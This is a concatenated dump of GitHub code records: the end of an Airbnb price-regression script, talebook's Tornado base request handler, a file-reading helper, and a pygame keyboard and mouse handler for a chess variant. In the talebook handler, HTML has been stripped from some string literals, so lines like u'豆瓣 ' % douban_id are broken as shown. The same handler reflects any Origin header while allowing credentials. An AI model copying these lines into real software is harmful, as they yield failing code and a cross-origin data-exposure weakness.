base_airbnb_cod['price']\nx = base_airbnb_cod.drop('price', axis = 1)\nX_train, X_test, y_train, y_test = train_test_split(x, y, random_state=10)\nfor nome_modelo, modelo in modelos.items():\n #treinar\n modelo.fit(X_train, y_train)\n #testar\n previsao = modelo.predict(X_test)\n print(avaliar_modelo(nome_modelo, y_test, previsao))","repo_name":"gitandlucsil/data_analytics","sub_path":"intensivao/aula3/aula3.py","file_name":"aula3.py","file_ext":"py","file_size_in_byte":9581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33770621291","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n\nimport base64\nimport datetime\nimport hashlib\nimport logging\nimport os\nimport time\nfrom collections import defaultdict\nfrom gettext import gettext as _\n\nfrom jinja2 import Environment, FileSystemLoader\nfrom sqlalchemy import func as sql_func\nfrom tornado import web\n\nfrom webserver import loader, utils\n\n# import social_tornado.handlers\nfrom webserver.models import Item, Message, Reader\n\nmessages = defaultdict(list)\nCONF = loader.get_settings()\n\n\ndef day_format(value, format=\"%Y-%m-%d\"):\n try:\n return value.strftime(format)\n except:\n return \"1990-01-01\"\n\n\ndef website_format(value):\n links = []\n for link in value.split(\";\"):\n if link.startswith(\"douban://\"):\n douban_id = link.split(\"//\")[-1]\n links.append(u\"豆瓣 \" % douban_id)\n elif link.startswith(\"isbn://\"):\n douban_id = link.split(\"//\")[-1]\n links.append(u\"豆瓣 \" % douban_id)\n elif link.startswith(\"http://\"):\n links.append(u\"参考链接 \" % link)\n return \";\".join(links)\n\n\ndef js(func):\n def do(self, *args, **kwargs):\n try:\n rsp = func(self, *args, **kwargs)\n rsp[\"msg\"] = rsp.get(\"msg\", \"\")\n except Exception as e:\n import traceback\n\n logging.error(traceback.format_exc())\n msg = (\n 'Exception:
%s
' % traceback.format_exc()\n )\n rsp = {\"err\": \"exception\", \"msg\": msg}\n if isinstance(e, web.Finish):\n rsp = \"\"\n origin = self.request.headers.get(\"origin\", \"*\")\n self.set_header(\"Access-Control-Allow-Origin\", origin)\n self.set_header(\"Access-Control-Allow-Credentials\", \"true\")\n self.set_header(\"Cache-Control\", \"max-age=0\")\n self.write(rsp)\n self.finish()\n return\n\n return do\n\n\ndef auth(func):\n def do(self, *args, **kwargs):\n if not self.current_user:\n return {\"err\": \"user.need_login\", \"msg\": _(u\"请先登录\")}\n return func(self, *args, **kwargs)\n\n return do\n\n\ndef is_admin(func):\n def do(self, *args, **kwargs):\n if not self.current_user:\n return {\"err\": \"user.need_login\", \"msg\": _(u\"请先登录\")}\n if not self.admin_user:\n return {\"err\": \"permission.not_admin\", \"msg\": _(u\"当前用户非管理员\")}\n return func(self, *args, **kwargs)\n\n return do\n\n\nclass BaseHandler(web.RequestHandler):\n _path_to_env = {}\n\n def get_secure_cookie(self, key):\n if not self.cookies_cache.get(key, \"\"):\n self.cookies_cache[key] = super(BaseHandler, self).get_secure_cookie(key)\n return self.cookies_cache[key]\n\n def set_secure_cookie(self, key, val):\n self.cookies_cache[key] = val\n super(BaseHandler, self).set_secure_cookie(key, val)\n return None\n\n def head(self, *args, **kwargs):\n return self.get(*args, **kwargs)\n\n def mark_invited(self):\n self.set_secure_cookie(\"invited\", str(int(time.time())))\n\n def need_invited(self):\n return CONF[\"INVITE_MODE\"] is True\n\n def invited_code_is_ok(self):\n t = self.get_secure_cookie(\"invited\")\n if t and int(float(t)) > int(time.time()) - 7 * 86400:\n return True\n return False\n\n def process_auth_header(self):\n auth_header = self.request.headers.get(\"Authorization\", \"\")\n if not auth_header.startswith(\"Basic \"):\n return False\n auth_decoded = base64.decodebytes(auth_header[6:].encode(\"ascii\")).decode(\"UTF-8\")\n username, password = auth_decoded.split(\":\", 2)\n user = self.session.query(Reader).filter(Reader.username == username).first()\n if not user:\n return False\n if user.get_secure_password(password) != str(user.password):\n return False\n self.mark_invited()\n self.login_user(user)\n return True\n\n def send_error_of_not_invited(self):\n self.write({\"err\": \"not_invited\"})\n self.set_status(200)\n raise web.Finish()\n\n def should_be_invited(self):\n if self.need_invited():\n if not self.invited_code_is_ok():\n return self.send_error_of_not_invited()\n\n def should_be_installed(self):\n if CONF.get(\"installed\", None) is False:\n self.write({\"err\": \"not_installed\"})\n self.set_status(200)\n raise web.Finish()\n\n def set_hosts(self):\n # site_url为完整路径,用于发邮件等\n host = self.request.headers.get(\"X-Forwarded-Host\", self.request.host)\n self.site_url = self.request.protocol + \"://\" + host\n\n # 默认情况下,访问站内资源全部采用相对路径\n self.api_url = \"\" # API动态请求地址\n self.cdn_url = \"\" # 可缓存的资源,图片,文件\n\n # 如果设置有static_host配置,则改为绝对路径\n if CONF[\"static_host\"]:\n self.api_url = self.request.protocol + \"://\" + host\n self.cdn_url = self.request.protocol + \"://\" + CONF[\"static_host\"]\n\n def prepare(self):\n self.set_hosts()\n self.set_i18n()\n self.process_auth_header()\n self.should_be_installed()\n self.should_be_invited()\n\n def set_i18n(self):\n return\n # TODO set correct language package\n # import gettext\n # accept = self.request.headers.get(\"Accept-Language\", \"\")\n # langs = [v.strip().split(\";\")[0] for v in accept.split(\",\") if v.strip()]\n # logging.debug(\"choose lang: %s\" % langs)\n # if not langs: langs = [\"zh_CN\"]\n # lang = gettext.translation('messages', localedir=CONF['i18n_path'], languages=langs, fallback=True)\n # lang.install(unicode=True)\n\n def initialize(self):\n ScopedSession = self.settings[\"ScopedSession\"]\n self.session = ScopedSession() # new sql session\n self.db = self.settings[\"legacy\"]\n self.cache = self.db.new_api\n self.build_time = self.settings[\"build_time\"]\n self.default_cover = self.settings[\"default_cover\"]\n self.admin_user = None\n self.cookies_cache = {}\n\n def on_finish(self):\n ScopedSession = self.settings[\"ScopedSession\"]\n ScopedSession.remove()\n\n def static_url(self, path, **kwargs):\n if path.endswith(\"/\"):\n prefix = self.settings.get(\"static_url_prefix\", \"/static/\")\n return self.cdn_url + prefix + path\n else:\n return self.cdn_url + super(BaseHandler, self).static_url(path, **kwargs)\n\n def user_id(self):\n login_time = self.get_secure_cookie(\"lt\")\n if not login_time or int(login_time) < int(time.time()) - 7 * 86400:\n return None\n uid = self.get_secure_cookie(\"user_id\")\n return int(uid) if uid.isdigit() else None\n\n def get_current_user(self):\n user_id = self.user_id()\n if user_id:\n user_id = int(user_id)\n user = self.session.query(Reader).get(user_id) if user_id else None\n logging.debug(\"Query User(%s) = %s\" % (user_id, user))\n\n admin_id = self.get_secure_cookie(\"admin_id\")\n if admin_id:\n self.admin_user = self.session.query(Reader).get(int(admin_id))\n elif user and user.is_admin():\n self.admin_user = user\n return user\n\n def is_admin(self):\n if self.admin_user:\n return True\n if not self.current_user:\n return False\n return self.current_user.is_admin()\n\n def login_user(self, user):\n logging.info(\"LOGIN: %s - %d - %s\" % (self.request.remote_ip, user.id, user.username))\n self.set_secure_cookie(\"user_id\", str(user.id))\n self.set_secure_cookie(\"lt\", str(int(time.time())))\n user.access_time = datetime.datetime.now()\n user.extra[\"login_ip\"] = self.request.remote_ip\n user.save()\n\n def add_msg(self, status, msg):\n m = Message(self.user_id(), status, msg)\n if m.reader_id:\n m.save()\n\n def pop_messages(self):\n if not self.current_user:\n return []\n messages = self.current_user.messages\n for m in messages:\n self.session.delete(m)\n self.session.commit()\n return messages\n\n def user_history(self, action, book):\n if not self.user_id():\n return\n extra = self.current_user.extra\n history = extra.get(action, [])\n for val in history[:12]:\n if val[\"id\"] == book[\"id\"]:\n return\n val = {\n \"id\": book[\"id\"],\n \"title\": book[\"title\"],\n \"timestamp\": int(time.time()),\n }\n history.insert(0, val)\n # an item is about 100Byte, sqlite's max length is 32KB\n # we have five type of history, so make a average limit of max history\n ITEM_COUNT_LIMIT = 60 # = 32KB/100B/5\n extra[action] = history[:ITEM_COUNT_LIMIT]\n user = self.current_user\n user.extra.update(extra)\n user.save()\n\n def last_modified(self, updated):\n \"\"\"\n Generates a locale independent, english timestamp from a datetime\n object\n \"\"\"\n lm = updated.strftime(\"day, %d month %Y %H:%M:%S GMT\")\n day = {0: \"Sun\", 1: \"Mon\", 2: \"Tue\", 3: \"Wed\", 4: \"Thu\", 5: \"Fri\", 6: \"Sat\"}\n lm = lm.replace(\"day\", day[int(updated.strftime(\"%w\"))])\n month = {\n 1: \"Jan\",\n 2: \"Feb\",\n 3: \"Mar\",\n 4: \"Apr\",\n 5: \"May\",\n 6: \"Jun\",\n 7: \"Jul\",\n 8: \"Aug\",\n 9: \"Sep\",\n 10: \"Oct\",\n 11: \"Nov\",\n 12: \"Dec\",\n }\n return lm.replace(\"month\", month[updated.month])\n\n def sort(self, items, field, order):\n from calibre.library.caches import SortKey, SortKeyGenerator\n\n class CSSortKeyGenerator(SortKeyGenerator):\n def __init__(self, fields, fm, db_prefs):\n SortKeyGenerator.__init__(self, fields, fm, None, db_prefs)\n\n def __call__(self, record):\n values = tuple(self.itervals(record))\n return SortKey(self.orders, values)\n\n field = self.db.data.sanitize_sort_field_name(field)\n if field not in self.db.field_metadata.sortable_field_keys():\n raise web.HTTPError(400, \"%s is not a valid sort field\" % field)\n\n keyg = CSSortKeyGenerator([(field, order)], self.db.field_metadata, self.db.prefs)\n items.sort(key=keyg)\n\n def get_template_path(self):\n \"\"\"获取模板路径\"\"\"\n return CONF.get(\"resource_path\", \"templates\")\n\n def create_template_loader(self, template_path):\n \"\"\"根据template_path创建相对应的Jinja2 Environment\"\"\"\n temp_path = template_path\n if isinstance(template_path, (list, tuple)):\n temp_path = template_path[0]\n\n env = BaseHandler._path_to_env.get(temp_path)\n if not env:\n logging.debug(\"create template env for [%s]\" % template_path)\n _loader = FileSystemLoader(template_path)\n env = Environment(loader=_loader)\n env.filters[\"day\"] = day_format\n env.filters[\"website\"] = website_format\n # env.globals['gettext'] = _\n BaseHandler._path_to_env[temp_path] = env\n return env\n\n def render_string(self, template_name, **kwargs):\n \"\"\"使用Jinja2模板引擎\"\"\"\n env = self.create_template_loader(self.get_template_path())\n t = env.get_template(template_name)\n namespace = self.get_template_namespace()\n namespace.update(kwargs)\n return t.render(**namespace)\n\n def html_page(self, template, *args, **kwargs):\n self.set_header(\"Cache-Control\", \"max-age=0\")\n request = self.request\n request.user = self.current_user\n request.user_extra = {}\n request.admin_user = self.admin_user\n if request.user:\n request.user_extra = self.current_user.extra\n if not request.user.avatar:\n request.user.avatar = \"//tva1.sinaimg.cn/default/images/default_avatar_male_50.gif\"\n else:\n request.user.avatar = request.user.avatar.replace(\"http://\", \"//\")\n\n last_week = datetime.datetime.now() - datetime.timedelta(days=7)\n page_vars = {\n \"db\": self.db,\n \"messages\": self.pop_messages(),\n \"count_all_users\": self.session.query(sql_func.count(Reader.id)).scalar(),\n \"count_hot_users\": self.session.query(sql_func.count(Reader.id))\n .filter(Reader.access_time > last_week)\n .scalar(),\n \"IMG\": self.cdn_url,\n \"SITE_TITLE\": CONF[\"site_title\"],\n }\n vals = dict(*args, **kwargs)\n vals.update(page_vars)\n vals.update(vars())\n del vals[\"self\"]\n self.write(self.render_string(template, **vals))\n\n def get_book(self, book_id):\n books = self.get_books(ids=[int(book_id)])\n if not books:\n self.write({\"err\": \"not_found\", \"msg\": _(u\"抱歉,这本书不存在\")})\n self.set_status(200)\n raise web.Finish()\n return books[0]\n\n def is_book_owner(self, book_id, user_id):\n auto = int(CONF.get(\"auto_login\", 0))\n if auto:\n return True\n\n query = self.session.query(Item)\n query = query.filter(Item.book_id == book_id)\n query = query.filter(Item.collector_id == user_id)\n return query.count() > 0\n\n def get_books(self, *args, **kwargs):\n _ts = time.time()\n books = self.db.get_data_as_dict(*args, **kwargs)\n logging.debug(\n \"[%5d ms] select books from library (count = %d)\" % (int(1000 * (time.time() - _ts)), len(books))\n )\n\n item = Item()\n empty_item = item.to_dict()\n empty_item[\"collector\"] = self.session.query(Reader).order_by(Reader.id).first()\n ids = [book[\"id\"] for book in books]\n items = self.session.query(Item).filter(Item.book_id.in_(ids)).all() if ids else []\n maps = {}\n for b in items:\n d = b.to_dict()\n c = b.collector.to_dict() if b.collector else empty_item[\"collector\"]\n d[\"collector\"] = c\n maps[b.book_id] = d\n for book in books:\n book.update(maps.get(book[\"id\"], empty_item))\n logging.debug(\n \"[%5d ms] select books from database (count = %d)\" % (int(1000 * (time.time() - _ts)), len(books))\n )\n return books\n\n def count_increase(self, book_id, **kwargs):\n try:\n item = self.session.query(Item).filter(Item.book_id == book_id).one()\n except:\n item = Item()\n item.book_id = book_id\n\n item.count_guest += kwargs.get(\"count_guest\", 0)\n item.count_visit += kwargs.get(\"count_visit\", 0)\n item.count_download += kwargs.get(\"count_download\", 0)\n item.save()\n\n def search_for_books(self, query):\n self.search_restriction = \"\"\n return self.db.search_getting_ids(\n (query or \"\").strip(),\n self.search_restriction,\n sort_results=False,\n use_virtual_library=False,\n )\n\n def all_tags_with_count(self):\n sql = \"\"\"SELECT tags.name, count(distinct book) as count\n FROM tags left join books_tags_link on tags.id = books_tags_link.tag\n group by tags.id\"\"\"\n tags = dict((i[0], i[1]) for i in self.cache.backend.conn.get(sql))\n return tags\n\n def get_category_with_count(self, field):\n table = field if field in [\"series\"] else field + \"s\"\n name_column = \"A.rating as name\" if field in [\"rating\"] else \"A.name\"\n args = {\"table\": table, \"field\": field, \"name_column\": name_column}\n sql = (\n \"\"\"SELECT A.id, %(name_column)s, count(distinct book) as count\n FROM %(table)s as A left join books_%(table)s_link as B\n on A.id = B.%(field)s group by A.id\"\"\"\n % args\n )\n logging.debug(sql)\n rows = self.cache.backend.conn.get(sql)\n items = [{\"id\": a, \"name\": b, \"count\": c} for a, b, c in rows]\n return items\n\n def books_by_id(self):\n sql = \"SELECT id FROM books order by id desc\"\n ids = [v[0] for v in self.cache.backend.conn.get(sql)]\n return ids\n\n def get_argument_start(self):\n start = self.get_argument(\"start\", 0)\n try:\n start = int(start)\n except:\n start = 0\n return max(0, start)\n\n def get_path_progress(self, book_id):\n return os.path.join(CONF[\"progress_path\"], \"progress-%s.log\" % book_id)\n\n def create_mail(self, sender, to, subject, body, attachment_data, attachment_name):\n from email.header import Header\n from email.mime.application import MIMEApplication\n from email.mime.multipart import MIMEMultipart\n from email.mime.text import MIMEText\n from email.utils import formatdate\n\n mail = MIMEMultipart()\n mail[\"From\"] = sender\n mail[\"To\"] = to\n mail[\"Subject\"] = Header(subject, \"utf-8\")\n mail[\"Date\"] = formatdate(localtime=True)\n mail[\"Message-ID\"] = \"\" % hashlib.md5(mail.as_string().encode(\"UTF-8\")).hexdigest()\n mail.preamble = \"You will not see this in a MIME-aware mail reader.\\n\"\n\n if body is not None:\n msg = MIMEText(body, \"plain\", \"utf-8\")\n mail.attach(msg)\n\n if attachment_data is not None:\n name = Header(attachment_name, \"utf-8\").encode()\n msg = MIMEApplication(attachment_data, \"octet-stream\", charset=\"utf-8\", name=name)\n msg.add_header(\"Content-Disposition\", \"attachment\", filename=name)\n mail.attach(msg)\n return mail.as_string()\n\n def mail(self, sender, to, subject, body, attachment_data=None, attachment_name=None, **kwargs):\n from calibre.utils.smtp import sendmail\n\n smtp_port = 465\n relay = kwargs.get(\"relay\", CONF[\"smtp_server\"])\n if ':' in relay:\n relay, smtp_port = relay.split(\":\")\n username = kwargs.get(\"username\", CONF[\"smtp_username\"])\n password = kwargs.get(\"password\", CONF[\"smtp_password\"])\n mail = self.create_mail(sender, to, subject, body, attachment_data, attachment_name)\n sendmail(\n mail,\n from_=sender,\n to=[to],\n timeout=20,\n port=int(smtp_port),\n encryption=\"SSL\",\n relay=relay,\n username=username,\n password=password,\n )\n\n\nclass ListHandler(BaseHandler):\n def get_item_books(self, category, name):\n books = []\n item_id = self.cache.get_item_id(category, name)\n if item_id:\n ids = self.db.get_books_for_category(category, item_id)\n books = self.db.get_data_as_dict(ids=ids)\n return books\n\n def do_sort(self, items, field, ascending):\n items.sort(key=lambda x: x[field], reverse=not ascending)\n\n def sort_books(self, items, field):\n fm = self.db.field_metadata\n keys = frozenset(fm.sortable_field_keys())\n if field in keys:\n ascending = fm[field][\"datatype\"] not in (\n \"rating\",\n \"datetime\",\n \"series\",\n \"timestamp\",\n )\n self.do_sort(items, field, ascending)\n else:\n self.do_sort(items, \"id\", False)\n return None\n\n @js\n def render_book_list(self, all_books, ids=None, title=None, sort_by_id=False):\n start = self.get_argument_start()\n try:\n size = int(self.get_argument(\"size\"))\n except:\n size = 60\n delta = min(max(size, 60), 100)\n\n if ids:\n ids = list(ids)\n count = len(ids)\n books = self.get_books(ids=ids[start : start + delta])\n if sort_by_id:\n # 归一化,按照id从大到小排列。\n self.do_sort(books, \"id\", False)\n else:\n count = len(all_books)\n books = all_books[start : start + delta]\n return {\n \"err\": \"ok\",\n \"title\": title,\n \"total\": count,\n \"books\": [self.fmt(b) for b in books],\n }\n\n def fmt(self, b):\n return utils.BookFormatter(self, b).format()\n","repo_name":"talebook/talebook","sub_path":"webserver/handlers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":20683,"program_lang":"python","lang":"en","doc_type":"code","stars":1831,"dataset":"github-code","pt":"38"} +{"seq_id":"770355027","text":"import os\nimport sys\n\ndef script_path():\n path = os.path.realpath(os.path.dirname(sys.argv[0]))\n os.chdir(path) #it seems to be quite important\n return path\n \ndef read_file(file_name, rmnl=False):\n '''read specified file and remove newlines depend on \"rmnl\" parameter'''\n path = os.path.realpath(os.path.dirname(sys.argv[0]))\n path = os.path.join(path, file_name)\n try:\n with open(path, \"r\") as file:\n if rmnl:\n fileContent = file.read().splitlines()\n else:\n fileContent = file.readlines()\n except:\n fileContent = []\n return fileContent\n\ndef simple_write(file, list_content):\n '''simple_write data to .txt file, with specified strContent'''\n with open(file, \"w\") as f:\n for line in list_content:\n try:\n f.write(\"{}\".format(line) + \"\\n\")\n except:\n print('could not write: {}'.format(line))\n f.close()\n return True \n \nif __name__ == \"__main__\":\n file = \"country_list_by_cute_baby_names.txt\"\n content = read_file(file, rmnl=True)\n content = list(set([item.split(\" in \")[1].split(\"\\t\")[0] for item in content if item.strip()]))\n content.sort()\n print(content)\n ","repo_name":"streanger/person-generator","sub_path":"scripts_for_use/extract_column.py","file_name":"extract_column.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"43313990932","text":"import sys\r\n\r\nimport pygame\r\nimport pygame.event\r\nfrom typing import Optional, Tuple\r\n\r\nfrom custom_types import Position\r\nimport draw_utils as du\r\nimport event_utils as eu\r\nfrom games import games\r\nfrom main_config import game, select_snd, play\r\nimport utils\r\n\r\nMousePos = Tuple[int, int]\r\n\r\n\r\ndef _select_game_mouse_event(mpos: MousePos):\r\n '''ゲームの種類の選択'''\r\n base_index = 10 * (game.page - 1)\r\n for i in range(2):\r\n for j in range(5):\r\n index = base_index + 5 * i + j\r\n if (index < len(games)\r\n and du.on_button(mpos, (40 + 460 * i, 40 + 160 * j), (420, 120))):\r\n eu.decide_game_event(index)\r\n return\r\n total_pages = len(games) // 10 + 1\r\n # 前のページへ\r\n if du.on_button(mpos, (260, 860), (130, 40)):\r\n eu.prev_page_event(total_pages)\r\n # 次のページへ\r\n elif du.on_button(mpos, (570, 860), (130, 40)):\r\n eu.next_page_event(total_pages)\r\n\r\n\r\ndef _select_game_key_event(key: int):\r\n '''ゲームの種類の選択画面'''\r\n # [0-9] ゲームの種類の選択\r\n if ord('0') <= key <= ord('9'):\r\n index = 10 * (game.page - 1) + key - 48\r\n if (index < len(games)):\r\n eu.decide_game_event(index)\r\n return\r\n total_pages = len(games) // 10 + 1\r\n # [←] 前のページへ\r\n if key == pygame.K_LEFT:\r\n eu.prev_page_event(total_pages)\r\n # [→] 次のページへ\r\n elif key == pygame.K_RIGHT:\r\n eu.next_page_event(total_pages)\r\n\r\n\r\ndef _settings_mouse_event(mpos: MousePos):\r\n '''色・モードなどの設定'''\r\n # 色\r\n if du.on_button(mpos, (120, 270), (300, 120)) and game.my_color == 'B':\r\n eu.select_color_event('W')\r\n elif du.on_button(mpos, (540, 270), (300, 120)) and game.my_color == 'W':\r\n eu.select_color_event('B')\r\n # モード\r\n elif du.on_button(mpos, (120, 570), (300, 120)) and game.mode == 'PvsC':\r\n eu.select_mode_event('PvsP')\r\n elif du.on_button(mpos, (540, 570), (300, 120)) and game.mode == 'PvsP':\r\n eu.select_mode_event('PvsC')\r\n # レベル\r\n elif game.level:\r\n for i in range(1, 6):\r\n if du.on_button(mpos, (180 + 120 * i, 750), (64, 32)) and game.level != i:\r\n game.level = i\r\n play(select_snd)\r\n return\r\n # 先読みの有無\r\n if du.on_button(mpos, (300, 840), (40, 40)):\r\n eu.toggle_foreseeing_event()\r\n # もどる\r\n elif du.on_button(mpos, (30, 30), (210, 90)):\r\n eu.back_event()\r\n # 決定\r\n elif du.on_button(mpos, (720, 30), (210, 90)):\r\n eu.start_game_event()\r\n\r\n\r\ndef _settings_key_event(key: int):\r\n '''色・モードなどの設定'''\r\n # [w] / [b] 色\r\n if key == pygame.K_w and game.my_color == 'B':\r\n eu.select_color_event('W')\r\n elif key == pygame.K_b and game.my_color == 'W':\r\n eu.select_color_event('B')\r\n # [p] / [c] モード\r\n elif key == pygame.K_p and game.mode == 'PvsC':\r\n eu.select_mode_event('PvsP')\r\n elif key == pygame.K_c and game.mode == 'PvsP':\r\n eu.select_mode_event('PvsC')\r\n elif game.level:\r\n # [1-5] レベル\r\n if 49 <= key <= 53 and game.level != key - 48:\r\n game.level = key - 48\r\n play(select_snd)\r\n return\r\n # [f] 先読みの有無\r\n elif key == pygame.K_f:\r\n eu.toggle_foreseeing_event()\r\n return\r\n # [backspace] もどる\r\n if key == pygame.K_BACKSPACE:\r\n eu.back_event()\r\n # [enter] 決定\r\n elif key == pygame.K_RETURN:\r\n eu.start_game_event()\r\n\r\n\r\ndef _back_to_home_mouse_event(mpos: MousePos):\r\n '''ゲーム選択メニューに戻る'''\r\n # 戻る\r\n if du.on_button(mpos, (360, 480), (90, 60)):\r\n eu.back_to_home_event()\r\n # 戻らない\r\n elif du.on_button(mpos, (510, 480), (90, 60)):\r\n eu.cancel_back_to_home_event()\r\n\r\n\r\ndef _back_to_home_key_event(key: int):\r\n '''ゲーム選択メニューに戻る'''\r\n # [y] 戻る\r\n if key == pygame.K_y:\r\n eu.back_to_home_event()\r\n # [n] 戻らない\r\n elif key == pygame.K_n:\r\n eu.cancel_back_to_home_event()\r\n\r\n\r\ndef _pieces_action_mouse_event(mpos: MousePos):\r\n '''駒の動作'''\r\n assert game.kind is not None\r\n _pos = du.parse_mouse(mpos, game.kind['size'], game.my_color == 'B')\r\n # アーチャーの発射\r\n if game.arrow_targets:\r\n eu.archer_attack_event(_pos)\r\n # 駒を移動させる\r\n else:\r\n eu.move_pieces_event(_pos)\r\n\r\n\r\ndef _specify_destination_key_event(key: int):\r\n '''移動先のマスを指定'''\r\n # [g] コマンドの記録を開始\r\n if key == pygame.K_g and game.dest_cmd is None:\r\n game.show_value = False\r\n game.show_user_guide = False\r\n game.dest_cmd = ''\r\n # [a-l] ファイルを指定\r\n elif ord('a') <= key <= ord('l') and game.dest_cmd == '':\r\n game.dest_cmd += chr(key)\r\n # [0-9] ランクを指定\r\n elif ord('0') <= key <= ord('9') and game.dest_cmd is not None and len(game.dest_cmd) < 3:\r\n game.dest_cmd += chr(key)\r\n # [enter] 確定・選択\r\n elif key == pygame.K_RETURN and game.dest_cmd:\r\n assert game.kind is not None\r\n _size = game.kind['size']\r\n _current = game.selecting_square or (0, 0)\r\n # ファイル\r\n # 指定されていたらそれを使う\r\n if 0 <= ord(game.dest_cmd[0]) - 97 < _size:\r\n _file = ord(game.dest_cmd[0]) - 97\r\n # 指定されていなかったら現在のものを使う\r\n else:\r\n _file = _current[0]\r\n # ランク\r\n _num = int(''.join(c for c in game.dest_cmd if c.isdigit()) or 0)\r\n # 指定されていたらそれを使う\r\n if 1 <= _num <= _size:\r\n _rank = _num - 1\r\n # 指定されていなかったら現在のものを使う\r\n else:\r\n _rank = _current[1]\r\n game.selecting_square = (_file, _rank)\r\n game.dest_cmd = None\r\n\r\n\r\ndef _specify_repeat_key_event(key: int):\r\n '''コマンド繰り返し回数の指定'''\r\n # [0-9] コマンド繰り返し回数の指定\r\n if ord('0') <= key <= ord('9'):\r\n game.show_value = False\r\n game.show_user_guide = False\r\n if game.cmd_repeat_num is None:\r\n if key == ord('0'):\r\n return\r\n game.cmd_repeat_num = chr(key)\r\n elif len(game.cmd_repeat_num) < 2:\r\n game.cmd_repeat_num += chr(key)\r\n\r\n\r\ndef _nav_square_key_event(key: int, shift: int, sel_sq: Optional[Position], rep: int):\r\n '''左/下/上/右の(駒のある)マス、左上/右上/左下/右下のマスを選択'''\r\n assert game.kind is not None\r\n _size = game.kind['size']\r\n _revesed = game.my_color == 'B'\r\n\r\n # [h][j][k][l] 左/下/上/右のマスを選択\r\n # [H][J][K][L] 左/下/上/右の次の駒があるマスを選択\r\n # [e][r][d][f] 左上/右上/左下/右下のマスを選択\r\n if key not in (pygame.K_h, pygame.K_j, pygame.K_k, pygame.K_l,\r\n pygame.K_e, pygame.K_r, pygame.K_d, pygame.K_f):\r\n return\r\n\r\n game.show_value = False\r\n game.show_user_guide = False\r\n game.cmd_repeat_num = None\r\n\r\n _left_key = pygame.K_l if _revesed else pygame.K_h\r\n _down_key = pygame.K_k if _revesed else pygame.K_j\r\n _up_key = pygame.K_j if _revesed else pygame.K_k\r\n _right_key = pygame.K_h if _revesed else pygame.K_l\r\n _lu_key = pygame.K_f if _revesed else pygame.K_e\r\n _ru_key = pygame.K_d if _revesed else pygame.K_r\r\n _ld_key = pygame.K_r if _revesed else pygame.K_d\r\n _rd_key = pygame.K_e if _revesed else pygame.K_f\r\n\r\n if sel_sq is None:\r\n game.selecting_square = game.startpos or (0, 0)\r\n elif key == _left_key and sel_sq[0] > 0:\r\n if shift:\r\n _x_list = sorted(x for x, y in game.gameboard if x < sel_sq[0] and y == sel_sq[1])\r\n if len(_x_list) > 0:\r\n _new_x = _x_list[-min(len(_x_list), rep)]\r\n else:\r\n return\r\n else:\r\n _new_x = max(0, sel_sq[0] - rep)\r\n game.selecting_square = _new_x, sel_sq[1]\r\n elif key == _down_key and sel_sq[1] > 0:\r\n if shift:\r\n _y_list = sorted(y for x, y in game.gameboard if x == sel_sq[0] and y < sel_sq[1])\r\n if len(_y_list) > 0:\r\n _new_y = _y_list[-min(len(_y_list), rep)]\r\n else:\r\n return\r\n else:\r\n _new_y = max(0, sel_sq[1] - rep)\r\n game.selecting_square = sel_sq[0], _new_y\r\n elif key == _up_key and sel_sq[1] < _size - 1:\r\n if shift:\r\n _y_list = sorted(y for x, y in game.gameboard if x == sel_sq[0] and y > sel_sq[1])\r\n if len(_y_list) > 0:\r\n _new_y = _y_list[min(len(_y_list), rep) - 1]\r\n else:\r\n return\r\n else:\r\n _new_y = min(_size - 1, sel_sq[1] + rep)\r\n game.selecting_square = sel_sq[0], _new_y\r\n elif key == _right_key and sel_sq[0] < _size - 1:\r\n if shift:\r\n _x_list = sorted(x for x, y in game.gameboard if x > sel_sq[0] and y == sel_sq[1])\r\n if len(_x_list) > 0:\r\n _new_x = _x_list[min(len(_x_list), rep) - 1]\r\n else:\r\n return\r\n else:\r\n _new_x = min(_size - 1, sel_sq[0] + rep)\r\n game.selecting_square = _new_x, sel_sq[1]\r\n elif key == _lu_key and sel_sq[0] > 0 and sel_sq[1] < _size - 1:\r\n game.selecting_square = max(0, sel_sq[0] - rep), min(_size - 1, sel_sq[1] + rep)\r\n elif key == _ru_key and sel_sq[0] < _size - 1 and sel_sq[1] < _size - 1:\r\n game.selecting_square = min(_size - 1, sel_sq[0] + rep), min(_size - 1, sel_sq[1] + rep)\r\n elif key == _ld_key and sel_sq[0] > 0 and sel_sq[1] > 0:\r\n game.selecting_square = max(0, sel_sq[0] - rep), max(0, sel_sq[1] - rep)\r\n elif key == _rd_key and sel_sq[0] < _size - 1 and sel_sq[1] > 0:\r\n game.selecting_square = min(_size - 1, sel_sq[0] + rep), max(0, sel_sq[1] - rep)\r\n\r\n\r\ndef _select_candidates_key_event(key: int, shift: int, sel_sq: Optional[Position], rep: int):\r\n '''行先・矢のターゲットの候補を選択'''\r\n # [n]/[N] 次/前の候補を選択\r\n if key != pygame.K_n:\r\n return\r\n\r\n game.show_value = False\r\n game.show_user_guide = False\r\n game.cmd_repeat_num = None\r\n _pos_candidates = None\r\n # 矢のターゲット\r\n if game.arrow_targets:\r\n _pos_candidates = sorted(game.arrow_targets)\r\n # 行先\r\n elif game.startpos is not None:\r\n _pos_candidates = game.valid_moves(game.gameboard[game.startpos], game.startpos)\r\n # 候補の選択\r\n if _pos_candidates is None:\r\n return\r\n\r\n if sel_sq in _pos_candidates:\r\n _new_index = (_pos_candidates.index(sel_sq) + (-rep if shift else rep)) % len(_pos_candidates)\r\n else:\r\n _new_index = -rep if shift else 0\r\n game.selecting_square = _pos_candidates[_new_index]\r\n\r\n\r\ndef _select_square_key_event(key: int, shift: int):\r\n '''位置の選択・駒の移動'''\r\n if game.cmd_repeat_num is None:\r\n _specify_destination_key_event(key)\r\n if game.dest_cmd is None:\r\n _sel_sq = game.selecting_square\r\n _rep = int(game.cmd_repeat_num or '1')\r\n _specify_repeat_key_event(key)\r\n _nav_square_key_event(key, shift, _sel_sq, _rep)\r\n _select_candidates_key_event(key, shift, _sel_sq, _rep)\r\n\r\n\r\ndef _pieces_action_key_event(key: int, shift: int):\r\n '''駒の動作'''\r\n # 選択を確定する\r\n if key == pygame.K_RETURN and game.dest_cmd is None:\r\n # アーチャーの発射\r\n if game.arrow_targets:\r\n eu.archer_attack_event(game.selecting_square)\r\n # 駒の移動\r\n else:\r\n eu.move_pieces_event(game.selecting_square)\r\n game.show_value = False\r\n 